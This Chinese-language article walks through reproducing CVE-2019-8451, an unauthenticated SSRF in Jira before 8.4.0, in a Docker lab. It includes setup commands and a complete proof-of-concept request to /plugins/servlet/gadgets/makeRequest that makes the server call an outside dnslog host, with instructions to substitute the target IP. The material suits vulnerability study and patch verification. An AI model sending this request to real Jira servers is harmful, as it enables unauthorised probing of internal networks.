千家信息网

Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

发表于:2024-10-26 作者:千家信息网编辑
千家信息网最后更新 2024年10月26日,这期内容当中小编将会给大家带来有关Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。0x00 简介
千家信息网最后更新 2024年10月26日Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析

这期内容当中小编将会给大家带来有关Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。

0x00 简介


JIRA是Atlassian公司出品的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。

0x01 漏洞概述


Jira的/plugins/servlet/gadgets/makeRequest资源存在SSRF漏洞,原因在于JiraWhitelist这个类的逻辑缺陷,成功利用此漏洞的远程攻击者可以以Jira服务端的身份访问内网资源。经分析,此漏洞无需任何凭据即可触发。(来自奇安信CERT)

0x02 影响范围


Jira < 8.4.0

0x03 环境搭建


在线靶场

开放时间(当前-9月29日20:00)

获取方式(完成任意一个):

1、将本文转发至朋友圈并配文字,截图发至公众号内

2、联系作者,五元红包

自行搭建

使用docker进行搭建,执行以下命令开启环境

docker pull cptactionhank/atlassian-jira:7.8.0
docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0

访问ip:8080进行安装

下图选择第二个

继续即可

点击next,后面漏了两张图

去生成JIRA使用许可证

生成之后找到License Key,回到页面填上License Key继续安装

至此,安装完毕。

0x04 漏洞利用


先访问ip:8080,然后刷新抓包

将数据包替换为如下Poc:

GET /plugins/servlet/gadgets/makeRequest?url=http://192.168.198.133:8080@bgkwd5.dnslog.cn HTTP/1.1Host: 192.168.198.133:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.198.133:8080/secure/Dashboard.jspaX-Atlassian-Token: no-checkContent-Length: 2

其中ip替换为目标ip,共三处

@后面改为你的dnslog的地址

repeater发包


去dnslog中刷新查看结果,可以看到有流量经过


如果访问未开放端口,结果是这样的:

上述就是小编为大家分享的Jira未授权SSRF产生CVE-2019-8451漏洞复现的示例分析了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注行业资讯频道。

0